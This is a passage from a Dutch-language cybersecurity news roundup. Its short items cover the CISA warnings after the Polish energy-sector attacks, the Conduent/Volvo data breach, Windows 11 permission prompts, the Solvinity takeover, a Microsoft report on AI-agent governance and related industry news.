CERT Polska's rapport benadrukt dat kwetsbare edge devices een belangrijk doelwit blijven voor dreigingsactoren. CISA's Binding Operational Directive (BOD) 26-02 wijst op de risico's van end-of-support edge devices. OT-devices zonder firmware verificatie kunnen permanent beschadigd raken. Operators wordt aangeraden updates te prioriteren die firmware verificatie mogelijk maken. Als updates niet direct mogelijk zijn, moeten cyber incident response plannen rekening houden met onbruikbare OT-devices om langdurige uitval te voorkomen. De aanvallers maakten gebruik van standaard inloggegevens om toegang te krijgen tot de HMI en RTU's. Het wordt aanbevolen om direct de standaard wachtwoorden te wijzigen en eisen te stellen aan integrators of OT-leveranciers om wachtwoordwijzigingen in de toekomst af te dwingen.

CISA en het Department of Energy’s Office of Cybersecurity, Energy Security, and Emergency Response (DOE CESER) adviseren OT asset owners en operators om de volgende bronnen te raadplegen voor meer informatie over de aanval en mitigaties: CERT Polska’s Energy Sector Incident Report en CISA’s joint fact sheet met FBI, EPA, en DOE Primary Mitigations to Reduce Cyber Threats to Operational Technology.

Bron: CISA

Bron 2: cert.pl

Volvo Group North America heeft bekendgemaakt dat het indirect slachtoffer is geworden van een datalek als gevolg van een compromittering van de IT-systemen bij Conduent, een Amerikaans bedrijf dat diensten verleent aan andere bedrijven, waaronder Volvo. Volvo Group North America is de tak van de Zweedse multinational die actief is in de Verenigde Staten, Canada en Mexico. Het bedrijf richt zich op de productie van commerciële voertuigen en zware machines, zoals vrachtwagens, bussen, bouwmachines, motoren en industriële energiesystemen. Mack Trucks, een populair merk in de VS, is een van de dochterondernemingen. Volvo Group is niet hetzelfde als Volvo Cars en produceert geen personenauto's.

Bijna 17.000 klanten van Volvo Group North America en/of medewerkers van het bedrijf zijn getroffen. Hun persoonlijke gegevens zijn blootgesteld bij een groot datalek dat Conduent eind 2025 bekendmaakte. Conduent is een Amerikaans bedrijf dat zich bezighoudt met business process outsourcing (BPO) en digitale platforms en diensten levert aan overheden en bedrijven. Het bedrijf werd getroffen door een beveiligingsincident tussen 21 oktober 2024 en 13 januari 2025, waarbij kwaadwillenden volledige namen, Burgerservicenummers (BSN's), geboortedata, details van zorgverzekeringen, ID-nummers en medische informatie stalen.

Conduent heeft nog niet vastgesteld hoeveel mensen precies zijn getroffen, maar heeft eerder bekendgemaakt dat het om 10,5 miljoen mensen in Oregon en nog eens 15,5 miljoen in Texas gaat. Het bedrijf stuurt nu namens zijn klanten meldingen naar de getroffen partijen en biedt klanten en medewerkers van Volvo Group North America een gratis lidmaatschap aan voor identiteitsmonitoringdiensten voor minstens een jaar, samen met credit- en dark webmonitoring en identiteitsherstel. Daarnaast wordt geadviseerd om fraudealerts te plaatsen of een security freeze op hun creditrapporten te zetten.

Volvo Group North America werd recentelijk ook getroffen door een nieuw datalek, eveneens veroorzaakt door een externe leverancier, waarbij personeelsgegevens zoals volledige namen en Burgerservicenummers werden blootgesteld. Dat lek werd veroorzaakt door een compromittering bij IT-dienstverlener Miljödata in augustus 2025, waarbij de informatie van 1,5 miljoen mensen werd blootgesteld, waaronder medewerkers van Volvo Group in Zweden en de VS. In 2021 werd Volvo Cars getroffen door een beveiligingsincident waarbij hackers onderzoeks- en ontwikkelingsgegevens (R&D) van de servers stalen. Die aanval werd opgeëist door de 'Snatch' data-afpersingsgroep, die de gestolen bestanden op hun afpersingsportaal lekte.

Bron: BleepingComputer

Bron 2: wiz.io

Bron 3: documentcloud.org

Bron 4: mass.gov

Bron 5: tines.com

Cloudinfrastructuren zijn complex, waardoor het onderzoeken van incidenten zoals een niet-reagerende EC2-instance of hoog CPU-gebruik tijdrovend kan zijn. Tines biedt een oplossing met een vooraf gebouwde workflow, "Investigate AWS issues with CLI data using agents", die de handmatige dataverzameling automatiseert door de CLI direct naar de case te brengen. Deze workflow overbrugt de kloof tussen waar het werk wordt bijgehouden (Jira, ServiceNow) en waar de data zich bevindt (AWS, Azure, interne logs).

De traditionele aanpak van incident response kent verschillende uitdagingen. Toegang tot de juiste data vereist het inloggen op meerdere consoles en het aannemen van rollen, wat tijdrovend is. Het correct uitvoeren van CLI-commando's vereist kennis van de juiste syntax en flags. Bovendien brengt het verlenen van brede leesrechten aan analisten beveiligingsrisico's met zich mee.

De Tines workflow maakt gebruik van agents, veilige en lichtgewicht runners, om CLI-commando's veilig uit te voeren binnen een intelligente workflow en de resultaten terug te sturen naar de analist. De workflow werkt als volgt: Een nieuwe case of ticket met betrekking tot een AWS-resource activeert de workflow. Tines instrueert een agent met gespecificeerde read-only toegang tot AWS om de benodigde CLI-commando's uit te voeren op basis van de context van het ticket. De agent genereert dynamisch de juiste CLI-commando's en voert deze uit. De ruwe CLI-output wordt vervolgens door Tines omgezet in een leesbare samenvatting of tabel, eventueel met behulp van AI. De bevindingen worden direct aan de Tines Case of ITSM-tool toegevoegd, waardoor de analist direct toegang heeft tot de benodigde informatie.

Deze aanpak biedt verschillende voordelen. Analisten hebben direct toegang tot de benodigde data, zonder handmatige dataverzameling. De Tines agent fungeert als een veilige proxy voor specifieke, goedgekeurde commando's, waardoor de noodzaak voor brede leesrechten wordt verminderd. Elke onderzoek heeft dezelfde data snapshot, wat zorgt voor een audit trail. Teams kunnen in real-time samenwerken aan de oplossing van incidenten.

De workflow is beschikbaar als een template in de Tines Library. Om de workflow te implementeren, moet de story "Investigate AWS issues with CLI data using agents" worden geïmporteerd, een AWS credential worden verbonden, aanbevolen commando's worden aangepast en de case format worden beoordeeld. Na het testen kan de workflow worden gebruikt om AWS-incidentonderzoek te automatiseren.

Bron: Tines

De Deense privacytoezichthouder Datatilsynet heeft 51 Deense gemeenten berispt voor het gebruik van Google-producten op scholen, met name Google Chromebooks en Google Workspace for Education in het basisonderwijs. In deze context zijn de gemeenten de verwerkingsverantwoordelijke en Google de gegevensverwerker, waarbij Google gebruikmaakt van een keten van subverwerkers.

Twee jaar geleden informeerde Datatilsynet de Europese privacytoezichthouders (EDPB) over de verplichtingen van de verwerkingsverantwoordelijke bij het gebruik van gegevensverwerkers en subverwerkers van buiten de EU. De EDPB stelde dat de verwerkingsverantwoordelijke een volledig overzicht moet hebben van alle verwerkers en subverwerkers, inclusief hun rollen, locaties en naleving van de AVG, met inbegrip van regels over internationale gegevensuitwisseling.

Datatilsynet concludeerde dat de gemeenten in hun rol als verwerkingsverantwoordelijke niet aan de AVG-verplichtingen voldoen. Ze hadden niet geverifieerd of de subverwerkers waarmee Google werkt zich aan de verwerkingsovereenkomst houden, met name wat betreft de doorgifte van data naar derde landen. Contractuele verplichtingen alleen zijn niet voldoende voor datadoorgifte naar onveilige landen zoals India, Mexico en Taiwan, aldus de toezichthouder.

Volgens Datatilsynet voldoet de verwerking van persoonlijke gegevens door de scholen niet aan de AVG-eisen. De toezichthouder stelt dat gemeenten waarschijnlijk de AVG overtreden als ze Google-producten gebruiken die niet op de juiste manier zijn geconfigureerd en uit ernstige kritiek op de verwerking van persoonsgegevens door de gemeenten bij het gebruik van Google-producten voor het lesgeven in het basisonderwijs. Ondanks de kritiek heeft Datatilsynet besloten geen boetes op te leggen en de zaak te sluiten.

Bron: Datatilsynet

Microsoft is van plan om in Windows 11 app-permissieprompts te introduceren die vergelijkbaar zijn met die op smartphones. Gebruikers zullen om toestemming worden gevraagd voordat apps toegang krijgen tot gevoelige resources zoals bestanden, camera's en microfoons. Deze initiatieven, genaamd "Windows Baseline Security Mode" en "User Transparency and Consent", vertegenwoordigen een belangrijke verschuiving voor het besturingssysteem dat op meer dan 1 miljard apparaten draait.

Volgens Windows Platform engineer Logan Iyer is dit nieuwe beveiligingsmodel ingegeven door applicaties die steeds vaker instellingen overschrijven, ongewenste software installeren of zelfs Windows-functionaliteiten aanpassen zonder toestemming van de gebruiker. Na de implementatie van de transparantie- en toestemmingswijzigingen zal Windows om toestemming vragen wanneer apps proberen ongewenste software te installeren of toegang te krijgen tot gevoelige resources. Gebruikers kunnen hun keuzes op elk moment wijzigen, net zoals op smartphones.

Windows Baseline Security Mode activeert standaard runtime-integriteitsbescherming, waardoor alleen correct ondertekende apps, services en drivers kunnen worden uitgevoerd. Gebruikers en IT-beheerders kunnen deze beveiligingen indien nodig uitschakelen voor specifieke apps. Iyer benadrukte dat gebruikers duidelijk kunnen zien welke apps toegang hebben tot gevoelige resources, zoals het bestandssysteem en apparaten zoals de camera en microfoon. Indien een onbekende app toegang heeft, kunnen gebruikers de toegang intrekken.

Deze wijzigingen worden gefaseerd uitgerold in nauwe samenwerking met ontwikkelaars, bedrijven en ecosystem partners. Microsoft is van plan de uitrol en de controles aan te passen op basis van feedback. Deze actie is onderdeel van Microsoft's Secure Future Initiative (SFI), die in november 2023 werd gelanceerd nadat de Cyber Safety Review Board van het U.S. Department of Homeland Security de beveiligingscultuur van het bedrijf als "ontoereikend" bestempelde. Dit volgde op een Exchange Online-inbreuk door de Chinese hackersgroep Storm-0558, waarbij een Microsoft consumer signing key werd gestolen in mei 2023, wat leidde tot brede toegang tot Microsoft cloud services.

Als onderdeel van dit initiatief heeft Microsoft ook plannen aangekondigd om Entra ID-aanmeldingen te beveiligen tegen script-injectie aanvallen, alle ActiveX-controls uit te schakelen in Microsoft 365 en Office 2024 Windows-apps, en de Microsoft 365 security defaults bij te werken om toegang tot SharePoint, OneDrive en Office-bestanden via legacy authenticatieprotocollen te blokkeren. Iyer voegde eraan toe dat van apps en AI-agenten verwacht wordt dat ze voldoen aan hogere transparantiestandaarden, waardoor zowel gebruikers als IT-beheerders beter inzicht krijgen in hun gedrag.

Bron: Microsoft

Bron 2: cisa.gov

Bron 3: blogs.windows.com

Bron 4: blogs.windows.com

Bron 5: wiz.io

Bron 6: tines.com

Het onderzoek naar de gevolgen van de dreigende overname van Solvinity door een Amerikaans bedrijf is nog gaande. Demissionair staatssecretaris Van Marum voor Digitalisering heeft de Tweede Kamer via een brief ingelicht over de laatste stand van zaken. De overheid volgt een driesporenbeleid in deze casus, waaronder een investeringstoetsing, een risicoanalyse en afspraken over mitigerende maatregelen.

Solvinity draait servers voor DigiD, MijnOverheid en het beveiligde communicatiesysteem van het ministerie van Justitie en Veiligheid. De aangekondigde overname van Solvinity zorgt voor zorgen over de integriteit van gegevens en continuïteit van de dienstverlening van overheidsdiensten.

De Autoriteit Consument en Markt (ACM) beoordeelt of de voorgenomen overname gevolgen voor concurrentie en marktwerking heeft. Het Bureau Toetsing Investeringen (BTI) kijkt daarnaast welke risico’s de overname voor de nationale veiligheid heeft. De Taskforce Economische Veiligheid (TFEV), een ambtelijk orgaan dat zich richt op economische veiligheidsrisico’s die de Nederlandse nationale veiligheidsbelangen kunnen raken, bespreekt risicoanalyses en adviezen in deze zaak. Er wordt onderzoek gedaan om tot een risico-inschatting en handelingsperspectief in deze zaak te komen.

Het onderzoek van de Landsadvocaat wijst uit dat Solvinity in geval van overname door Kyndryl binnen het bereik valt van bepaalde Amerikaanse wetgeving met extraterritoriale werking. De gevolgen hiervan voor de data-integriteit en continuïteit van dienstverlening worden momenteel onderzocht als onderdeel van de integrale risico-afweging. Om bepaalde vastgestelde risico's te mitigeren vinden er gesprekken plaats met de Landsadvocaat, Solvinity en Kyndryl over generieke aanvullende maatregelen. DigiD-beheerder Logius en het ministerie van Justitie en Veiligheid maken apart afspraken met Solvinity over specifieke technische risico-mitigerende maatregelen voor specifieke dienstverlening.

De overheid zal op basis van de uitkomsten van de toetsen en de beoordeling van de risico-analyse verdere acties in gang zetten. De continuïteit van kritieke overheidsprocessen is van cruciaal belang, waarmee alle opties om de continuïteit van ICT-dienstverlening te borgen open zijn, aldus Van Marum.

Bron: Rijksoverheid

Het cloudbedrijf Solvinity heeft onderzocht of de Nederlandse overheid interesse had in een overname, maar dit bleek niet het geval. Demissionair staatssecretaris Van Marum voor Digitalisering laat weten dat eigenaarschap van bedrijven in principe een marktaangelegenheid is. De reactie kwam op Kamervragen van JA21 over de dreigende overname van Solvinity door een Amerikaans bedrijf.

Solvinity draait diensten als DigiD en MijnOverheid, en het beveiligde communicatiesysteem van het ministerie van Justitie en Veiligheid. In maart vorig jaar informeerde Solvinity DigiD-beheerder Logius onder embargo over de zoektocht naar een overnamekandidaat. Op verzoek van de directeur van Logius werd het embargo gedeeltelijk opgeheven, waarna een beperkt aantal personen van het ministerie van Binnenlandse Zaken werd ingelicht. Ook een directeur bij het ministerie van Justitie en Veiligheid werd onder embargo geïnformeerd.

JA21-Kamerlid Van den Berg vroeg of de overheid de mogelijkheid had om Solvinity zelf over te nemen. Van Marum antwoordde dat Solvinity zowel bij Logius als het ministerie van Justitie en Veiligheid heeft gepeild of er interesse was in een overname door de overheid. "De overheid of een van haar diensten heeft niet overwogen om Solvinity zelf over te nemen of in eigen handen te brengen", aldus de staatssecretaris.

Het kabinet vindt dat publiek eigenaarschap of het actief beïnvloeden van de eigendomsstructuur van bedrijven geen kerntaak van de overheid is. De overnameplannen van Solvinity leidden tot kritiek onder experts en politici. Voor toekomstige gevallen wordt een procedure ontwikkeld om informatie over mogelijke overnames gestroomlijnder te delen met de ambtelijke en politieke top van de betrokken ministeries. "Hiervoor wordt een handelingskader opgesteld", aldus Van Marum.

Bron: Rijksoverheid

Microsoft heeft het nieuwe Cyber Pulse-rapport gepubliceerd, dat inzicht geeft in de opkomst van AI-agents binnen organisaties. Uit het rapport blijkt dat meer dan 80% van de Fortune 500-bedrijven gebruikmaakt van actieve AI-agents, vaak gebouwd met low-code/no-code tools. Deze agents worden ingezet in diverse workflows, variërend van sales en finance tot security en customer service.

Het rapport benadrukt dat de snelle adoptie van AI-agents leidt tot nieuwe cybersecurity risico's, met name op het gebied van governance en zichtbaarheid. AI-agents opereren op grote schaal en met hoge snelheid, waardoor het voor organisaties lastig is om overzicht te houden. Microsoft stelt dat deze agents beschermd moeten worden volgens Zero Trust principes, net als menselijke gebruikers.

Een belangrijk punt is dat de ontwikkeling van AI-agents niet beperkt is tot technische rollen; medewerkers in diverse functies creëren en gebruiken agents in hun dagelijkse werkzaamheden. Deze agents kunnen zowel assisterend zijn, reagerend op gebruikersprompts, als autonoom, waarbij ze taken uitvoeren met minimale menselijke tussenkomst.

Het Cyber Pulse-rapport waarschuwt voor "shadow AI", waarbij medewerkers gebruikmaken van niet-goedgekeurde AI-agents voor werkgerelateerde taken. Uit het rapport blijkt dat al 29% van de werknemers dit doet. Dit gebrek aan controle kan leiden tot risico's op het gebied van toegang, databescherming en compliance. AI-agents kunnen permissies erven, toegang krijgen tot gevoelige informatie en outputs genereren buiten het zicht van IT- en securityteams.

Microsoft adviseert organisaties om de volgende vijf kerncapaciteiten te implementeren voor een goede observatie en governance van AI-agents: inzicht in agentactiviteiten, controle over agenttoegang, bescherming van data die door agents wordt gebruikt, compliance met regelgeving en verantwoording voor agentacties.

Het rapport benadrukt dat AI-governance niet alleen een IT-aangelegenheid is, en AI-security niet alleen de verantwoordelijkheid van de CISO. Het vereist een samenwerking tussen verschillende afdelingen, waaronder legal, compliance, HR, data science en business leadership.

Organisaties die AI-risico's behandelen als een integraal onderdeel van hun enterprise risk management, zijn beter in staat om snel en veilig te innoveren. Een sterke security en governance zorgen voor transparantie, wat een concurrentievoordeel kan opleveren.

Bron: Microsoft

Uit onderzoek van de KU Leuven blijkt dat een totaalverbod op smartphones op school eerder negatieve dan positieve gevolgen heeft voor het welzijn van leerlingen. In scholen met een strikt verbod stijgen depressieve gevoelens en voelen kwetsbare jongeren zich eenzamer. Professor Laura Vandenbosch stelt dat een verbod geen wonderoplossing is en dat het vooral belangrijk is om met jongeren in gesprek te gaan.

Vanaf dit schooljaar geldt in Vlaanderen een absoluut smartphoneverbod in het basisonderwijs en in de eerste en tweede graad van het middelbaar onderwijs. Het onderzoek van de KU Leuven, uitgevoerd door professoren Laura Vandenbosch, Kathleen Beullens, Lara Scheurs en onderzoeker Jana Vereecke, bestudeerde scholen die vorig schooljaar al een eigen verbod hanteerden. De conclusie is dat een strikt verbod contraproductief werkt voor het mentale welzijn. In scholen waar de smartphone volledig werd verbannen, werd op termijn een stijging in depressieve gevoelens geconstateerd, aldus professor mediapsychologie Vandenbosch.

Het onderzoek toonde aan dat de negatieve trend minder aanwezig was in scholen met een gedeeltelijk verbod, waar leerlingen hun smartphone tijdens bepaalde pauzes mochten gebruiken. Voor sommige leerlingen neemt de eenzaamheid juist toe wanneer de smartphone wordt weggenomen. Kwetsbare leerlingen gebruiken hun smartphone vaak als een sociale steunpilaar, aldus Vandenbosch.

Een verbod helpt slechts even om cyberpesten de kop in te drukken. Een maand na de invoering daalt het pestgedrag, maar op de lange termijn houdt die daling geen stand. Sommige groepen jongeren lappen het verbod aan hun laars. Slachtoffers van cyberpesten gaven aan dat ze weinig tot geen verschil merkten na de invoering van de ban.

Professor Vandenbosch waarschuwt dat een loutere ban niet volstaat. De sleutel ligt volgens de onderzoekers bij dialoog. Scholen moeten in gesprek gaan met jongeren. Jongeren vragen zelf om kaders om beter met hun smartphone om te gaan, maar ze willen vooral inspraak in hoe die regels er op hun school uitzien.

Bron: KU Leuven | Bron 2: bsky.app

Het Amerikaanse cyberagentschap CISA heeft de energiesector in de Verenigde Staten gewaarschuwd naar aanleiding van aanvallen op de Poolse energiesector waarbij gebruik werd gemaakt van standaard wachtwoorden. Energiebedrijven worden dringend verzocht om al hun standaard wachtwoorden onmiddellijk te wijzigen.

Eind december 2025 werden diverse onderdelen van de Poolse energiesector, waaronder wind- en zonneparken en een warmtekrachtcentrale, het doelwit van cyberaanvallen. Het Poolse Computer Emergency Response Team (CERT) meldde eind januari dat de aanvallers toegang wisten te verkrijgen via Fortinet FortiGate-firewalls door gebruik te maken van standaard inloggegevens.

Uit de analyse van het Poolse CERT bleek dat de VPN-interface van de Fortinet-firewalls toegankelijk was vanaf het internet en dat accounts konden inloggen zonder multifactorauthenticatie. De exacte methode waarmee de aanvallers toegang kregen tot de apparaten is nog onbekend, maar onderzoek wees uit dat sommige FortiGate-firewalls in het verleden kwetsbaarheden hadden vertoond, waaronder beveiligingslekken die remote code execution mogelijk maakten.

Door gebruik te maken van standaard wachtwoorden konden de aanvallers toegang krijgen tot diverse achterliggende systemen. Tijdens de aanval werd ook malafide firmware geüpload om apparaten te beschadigen, wat mogelijk was doordat er geen firmware-verificatie plaatsvond.

Het Cybersecurity and Infrastructure Security Agency (CISA) van het Amerikaanse ministerie van Homeland Security benadrukt dat het rapport van het Poolse CERT drie belangrijke punten illustreert: kwetsbare edge devices blijven een aantrekkelijk doelwit voor aanvallers, OT-apparaten zonder firmware-verificatie kunnen permanent beschadigd raken, en aanvallers maken gebruik van standaard wachtwoorden om toegang te krijgen tot cruciale systemen.

Het cyberagentschap adviseert beheerders om direct alle standaard wachtwoorden te wijzigen en OT-leveranciers te verplichten om in de toekomst wachtwoordwijzigingen door te voeren. Daarnaast worden energiebedrijven aangespoord om edge devices, zoals firewalls en VPN-servers, die end-of-life zijn, te vervangen.

Bron: CISA

Test Data Management (TDM)-tools helpen QA- en DevOps-teams om de testdata te verkrijgen die ze nodig hebben, zonder releases te vertragen of gevoelige informatie in gevaar te brengen. Met CI/CD-pipelines en continue tests als standaard, kunnen testdata-knelpunten stilletjes een van de grootste obstakels voor release-snelheid worden.

Hieronder staan de beste TDM-tools om in 2026 in de gaten te houden, op basis van hoe ze presteren in real-world omgevingen en wat gebruikers er consistent over benadrukken.

1. K2view Test Data Management

K2view Test Data Management-tools zijn ontworpen voor QA- en DevOps-teams die werken met complexe data-omgevingen met meerdere systemen. Het is een zelfstandige, selfservice-oplossing die is ontworpen om snel gerichte testdatasets te leveren, terwijl relaties tussen systemen intact blijven. Teams kunnen data subsetten, omgevingen vernieuwen, wijzigingen terugdraaien, datasets reserveren en zelfs data op aanvraag verouderen, zodat ze altijd de juiste data op het juiste moment hebben. Het bevat ook intelligente datamasking en het genereren van synthetische data om gevoelige informatie te beschermen zonder de testvaliditeit te schaden.

K2view geeft QA-teams echte selfservice-toegang tot testdata, zodat teams kleinere, gerichte datasets kunnen creëren, versies kunnen volgen, wijzigingen ongedaan kunnen maken en data kunnen reserveren zonder constant op data engineering-teams te vertrouwen. Het ondersteunt geautomatiseerde ontdekking en classificatie van gevoelige data (zoals PII) en maskeert zowel gestructureerde als ongestructureerde data met behulp van een brede bibliotheek van ingebouwde maskingfuncties. Het ondersteunt ook het genereren van synthetische data (op regels gebaseerd en AI-ondersteund) en behoudt de referentiële integriteit tussen databronnen, wat cruciaal is wanneer testen meerdere systemen omvat.

QA-teams waarderen de snelle en herhaalbare levering van testdata, en de vrijheid om onafhankelijk te werken, waarbij de eenvoud van de selfservice-ervaring, inclusief een natuurlijke-taal chat-stijl interface, wordt benadrukt. Zoals de meeste TDM-platforms van enterprise-klasse, profiteert het van upfront implementatieplanning en levert het de beste waarde op enterprise-schaal.

2. Perforce Delphix Test Data Management

Perforce Delphix richt zich op het snel leveren van conforme testdata via datavirtualisatie. In plaats van volledige databases te kopiëren, creëert Delphix virtuele datakopieën, zodat teams sneller kunnen beginnen met testen terwijl de opslagoverhead wordt verminderd. Het bevat ook ingebouwde masking- en synthetische datafuncties om gevoelige data beschermd te houden in niet-productieomgevingen.

Delphix is sterk in spin-up snelheid: teams kunnen op aanvraag virtuele testomgevingen provisioneren zonder te wachten op volledige datakopieën. Het ondersteunt gecentraliseerd beheer, datasetversiebeheer, masking en automatisering via API's, wat handig is voor DevOps-achtige workflows waarbij omgevingen frequent worden vernieuwd. Teams waarderen snelle toegang tot testdata zonder enorme datasets te dupliceren (en zonder te betalen voor de opslag die daarbij hoort). Gebruikers merken vaak beperkingen op rond rapportage en analyses en hiaten in de diepte van CI/CD-integratie. Kosten en complexiteit kunnen ook een barrière vormen voor kleinere organisaties.

3. Datprof Test Data Management Platform

Datprof is gericht op middelgrote teams die privacy-veilige testdatalevering willen zonder de overhead van zware enterprise-platforms. Het benadrukt automatisering en bruikbaarheid, waardoor QA-teams testdata kunnen beheren terwijl compliance-doelen worden ondersteund.

Datprof ondersteunt masking, subsetting en provisioning via een gecentraliseerde portal, met selfservice-opties voor QA-teams. Door te werken met kleinere, goed gedefinieerde datasets, kan het de infrastructuurkosten verlagen en GDPR-compatibele workflows vereenvoudigen. CI/CD-integratie helpt bij het automatiseren van de levering van testdatasets in moderne pipelines. Het wordt vaak gezien als een praktische balans tussen automatisering, compliance en bruikbaarheid, vooral voor teams die snel resultaten willen zonder een al te complexe uitrol. De initiële setup kan echter nog steeds technisch zijn, en het product heeft minder peer reviews in vergelijking met de meest gevestigde leveranciers.

4. IBM InfoSphere Optim Test Data Management

IBM Optim is een al lang bestaande TDM-oplossing die vaak wordt gebruikt door grote ondernemingen, vooral die in gereguleerde industrieën of die legacy- en mainframe-zware omgevingen draaien. Het is krachtig en stabiel, maar niet lichtgewicht.

Optim is sterk in het produceren van nauwkeurige subsets van productiedata met behoud van relationele integriteit. Het bevat maskingmogelijkheden (zoals de-identificatie en substitutie) en ondersteunt het verkleinen van testdatabases om de opslagkosten te verlagen. Het ondersteunt ook een breed scala aan platforms, waaronder mainframes, waardoor het een go-to is voor complexe legacy-omgevingen. Het is stabiel, goed gedocumenteerd en vertrouwd in gereguleerde omgevingen met een hoge complexiteit. Het is echter duur, heeft een steile leercurve en implementaties kunnen complex zijn, vooral voor teams die snel willen bewegen in moderne DevOps-bedrijfsmodellen.

5. Informatica Test Data Management

De TDM-mogelijkheden van Informatica automatiseren core testdataprocessen zoals ontdekking, masking, subsetting en het genereren van synthetische data, met behoud van relaties. Het is het meest aantrekkelijk voor organisaties die al gestandaardiseerd zijn op het bredere ecosysteem van Informatica.

Informatica automatiseert essentiële workflows voor testdatavoorbereiding en biedt een portal voor teams om datasets te beheren en te resetten. Het ondersteunt een breed scala aan databases, cloudbronnen en big data-platforms, en integreert nauw met Informatica-tools (waaronder PowerCenter en gerelateerde suite-mogelijkheden). Het past van nature in omgevingen waar Informatica al op grote schaal wordt gebruikt, waardoor frictie voor integratie en governance-afstemming wordt verminderd. Buiten het Informatica-ecosysteem kan de setup moeilijker zijn, en gebruikers melden soms een tragere prestatie in vergelijking met nieuwere, meer DevOps-native platforms.

6. Broadcom Test Data Manager

Broadcom's Test Data Manager wordt vaak gebruikt in lang gevestigde ondernemingen met zware infrastructuurvoetafdrukken. Het dekt een breed scala aan masking-, subsetting- en testdatageneratiebehoeften, maar kan zwaar aanvoelen voor teams die prioriteit geven aan moderne DevOps-eenvoud.

Broadcom ondersteunt masking, subsetting en het genereren van synthetische testdata, met een portal voor selfservice-provisioning en herbruikbare testassets. Het is ook gepositioneerd om de testduur en opslag te verminderen door middel van virtuele testdata-benaderingen en geautomatiseerde ontdekking en compliance-scanning. Het kan een sterke match zijn voor grote ondernemingen die al Broadcom-tools gebruiken en een geconsolideerde benadering van testdata-assets willen. Gebruikers noemen echter vaak UI- en bruikbaarheidsuitdagingen en implementatie-inspanningen. Voor kleinere teams of snel bewegende DevOps-organisaties kan de overhead opwegen tegen de voordelen.

Nu QA-cycli versnellen en de privacyverwachtingen stijgen, evolueren TDM-tools snel: sommige leveranciers geven prioriteit aan governance en legacy-dekking, terwijl nieuwere platforms de nadruk leggen op automatisering, snelheid en selfservice. In 2026 is de duidelijkste splitsing tussen zware enterprise-platforms die zijn gebouwd voor gereguleerde complexiteit en next-generation tools die zijn gebouwd om knelpunten in CI/CD weg te nemen.

De juiste keuze hangt af van hoe complex uw datalandschap is, hoe snel uw teams omgevingen moeten opzetten en hoeveel autonomie QA nodig heeft om snel te bewegen, zonder compliance in gevaar te brengen.

Bron: HackRead | Bron 2: beyondtrust.com

Microsoft 365-beheerders in Noord-Amerika ondervinden wijdverspreide toegangsproblemen tot het Microsoft 365 Admin Center. Dit is bevestigd door het service health dashboard van het bedrijf. Issue ID MO1230320 markeert een servicevermindering die de kern van de Microsoft 365-suite treft, waardoor kritieke beheertaken zoals user provisioning, beveiligingsconfiguraties en compliance monitoring worden verstoord.

De storing, die voor het eerst werd opgemerkt rond 20:20 GMT+5:30 (10:50 AM ET), heeft duizenden enterprise gebruikers belemmerd om in te loggen of administratieve functies uit te voeren. Het probleem treft voornamelijk Noord-Amerikaanse regio's, met telemetrie die intermitterende fouten in authenticatie endpoints en API-calls naar de admin portal aangeeft. Gebruikers melden HTTP 5xx errors, lange laadtijden en complete session timeouts bij pogingen om toegang te krijgen tot admin.microsoft.com.

Microsoft's laatste update om 21:18 GMT+5:30 meldt dat het team "telemetrie met betrekking tot Microsoft 365 admin center toegang blijft beoordelen om de bron van het probleem te isoleren." Een follow-up wordt beloofd om 20:48 GMT+5:30, hoewel tijdlijnen zijn verschoven te midden van lopende diagnostics.

Er is geen oorzaak vastgesteld, maar vroege indicatoren suggereren backend scaling issues in de Azure Active Directory (AAD) integratie of een piek in API traffic die regionale datacenters overbelast.

Deze verstoring heeft gevolgen die verder reiken dan het admin center. Admins die Exchange Online, SharePoint, Teams governance en Intune device policies beheren, ervaren vertragingen in routine operaties. Bulk user license assignments staan bijvoorbeeld stil, wat de compliance met GDPR of HIPAA deadlines in gevaar brengt. Kleine tot middelgrote bedrijven die afhankelijk zijn van delegated admin roles melden de grootste frustratie, omdat self-service recovery opties zoals PowerShell cmdlets de portal omzeilen en geavanceerde scripting kennis vereisen.

Workarounds zijn het gebruik van Microsoft Graph API endpoints voor urgente taken zoals POST /users via delegated permissions, of het terugvallen op legacy portals zoals het classic Exchange admin center. Microsoft adviseert om de service health page van het admin center te monitoren en proactieve alerts in te schakelen via de Microsoft 365 admin mobile app.

In het verleden waren soortgelijke incidenten het gevolg van certificate rotations, DDoS mitigation false positives of misconfigured load balancers in Azure’s global network. Terwijl het onderzoek voortduurt, spoort Microsoft getroffen gebruikers aan om diagnostic data in te dienen via de “Run tests” feature in het admin center.

Bron: Microsoft

De Senaatscommissie voor Inlichtingen heeft met 14 tegen 3 gestemd om de voordracht van president Donald Trump van luitenant-generaal Joshua Rudd als hoofd van U.S. Cyber Command en de National Security Agency (NSA) door te sturen naar de volledige Senaat. Rudd is momenteel de plaatsvervangend chef van U.S. Indo-Pacific Command.

Eerder had de Senaatscommissie voor de strijdkrachten, die ook zeggenschap heeft over de benoeming, Rudd al goedgekeurd. Rudd heeft geen ervaring op het gebied van cyberoorlogsvoering of inlichtingen.

De benoeming komt op een moment dat beide organisaties al tien maanden zonder permanent leider zitten. President Trump ontsloeg de vorige chef, samen met zijn NSA-plaatsvervanger, na een ontmoeting met de activist Laura Loomer.

De Senaat kan deze week al over de benoeming van Rudd stemmen. Senatoren kunnen de stemming echter vertragen. Eind vorige maand werd generaal-majoor Lorna Mahlock, hoofd van de Cyber National Mission Force, benoemd tot Rudd's plaatsvervanger. Verwacht wordt dat brigadegeneraal Matthew Lennox, een hoge leider bij U.S. Army Cyber Command, Mahlock zal opvolgen als hoofd van de elite-eenheid.

Bron: The Record | Bron 2: congress.gov | Bron 3: news.ycombinator.com | Bron 4: bsky.app | Bron 5: recordedfuture.com

De Cybersecurity and Infrastructure Security Agency (CISA) heeft een rapport gepubliceerd over de uitdagingen bij het beveiligen van Operational Technology (OT)-communicatie. Het rapport, getiteld "Barriers to Secure OT Communication: Why Johnny Can't Authenticate", onderzoekt de redenen waarom veilige authenticatie in OT-omgevingen vaak achterwege blijft.

Het rapport benadrukt verschillende factoren die bijdragen aan dit probleem. Een belangrijke factor is de complexiteit van OT-systemen, die vaak bestaan uit een mix van oude en nieuwe technologieën. Deze systemen zijn doorgaans ontworpen voor betrouwbaarheid en veiligheid, maar niet noodzakelijk voor cyberbeveiliging.

Een andere barrière is het gebrek aan bewustzijn en expertise op het gebied van cyberbeveiliging binnen OT-teams. OT-professionals zijn vaak experts in hun specifieke vakgebied, maar missen mogelijk de kennis en vaardigheden om cyberdreigingen te identificeren en te mitigeren.

